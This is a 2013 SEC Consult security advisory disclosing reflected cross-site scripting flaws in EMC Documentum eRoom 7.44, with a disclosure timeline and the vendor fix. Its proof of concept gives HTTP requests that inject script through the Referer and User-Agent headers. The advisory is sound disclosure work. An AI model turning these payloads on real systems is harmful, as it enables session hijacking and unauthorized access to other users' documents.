SEC Consult Vulnerability Lab Security Advisory < 20131107-0 >
=======================================================================
title: Multiple reflected cross-site scripting vulnerabilities
product: EMC Documentum eRoom
vulnerable version: 7.44
fixed version: 7.4.4 P11
CVE: CVE-2013-3286
impact: medium
homepage: www.emc.com/products/detail/software2/eroom.htm
found: 2012-08-20
by: V. Paulikas
SEC Consult Vulnerability Lab
=======================================================================
Vendor description:
-------------------
"EMC Documentum eRoom is easy-to-use online team collaboration software that
enables distributed teams to work together more efficiently. With Documentum
eRoom, teams around the world can accelerate document collaboration and group
activities, improve the development and delivery of products and services,
optimize collaborative business processes, improve innovation, and streamline
decision-making."
www.emc.com/products/detail/software2/eroom.htm
Vulnerability overview/description:
-----------------------------------
Documentum eRoom suffers from multiple reflected cross-site scripting
vulnerabilities, which allow an attacker to steal other user's sessions,
to impersonate other users and to gain unauthorized access to documents
hosted in eRooms. A JavaScript worm could be utilized to crawl an eRoom and
gather all available documents.
There are many parameters which are not properly sanitized and thus are
vulnerable to XSS.
Proof of concept:
-----------------
1) The "Referer" header is not properly validated and is thus prone to reflected cross-site
scripting.
Request:
POST /eRoomASP/Connect.asp?Ctxt=&ERClickInMap=FALSE&command=btnDefault&SessionKey= HTTP/1.1
Host: localhost
Referer: localhost/eRoomxss"><script>alert(document.cookie)</script>
IEDummyField=bugfix+29315&SubmitChecker=set&HasRichText=false&SessionKey=&ERWindowName=eRw1343558275&LoginName=asd&Password=asd
2) The "User-Agent" header is not properly validated and is thus prone to reflected cross-site
scripting.
Request:
GET /eRoomtest/diagVariables.asp HTTP/1.1
User-Agent: <script>alert(document.cookie)</script>
Host: localhost
Other vulnerable header fields include "Connection" and "Accept-Language".
Vendor contact timeline:
------------------------
2012-10-09: Contacting vendor through security_alert@emc.com
2012-10-09: Vendor forwarded information to product team
2012-10-31: Vendor investigates reported issues
2013-07-16: Vendor will release the fixes of the issues with 7.4.4 SP1 in early Q2 2014
2013-11-13: Coordinated release of advisory
Solution:
---------
Upgrade to EMC Documentum eRoom version 7.4.4 P11.
Advisory URL:
-------------
www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: www.sec-consult.com
Blog: blog.sec-consult.com
Twitter: twitter.com/sec_consult
EOF V. Paulikas / @2013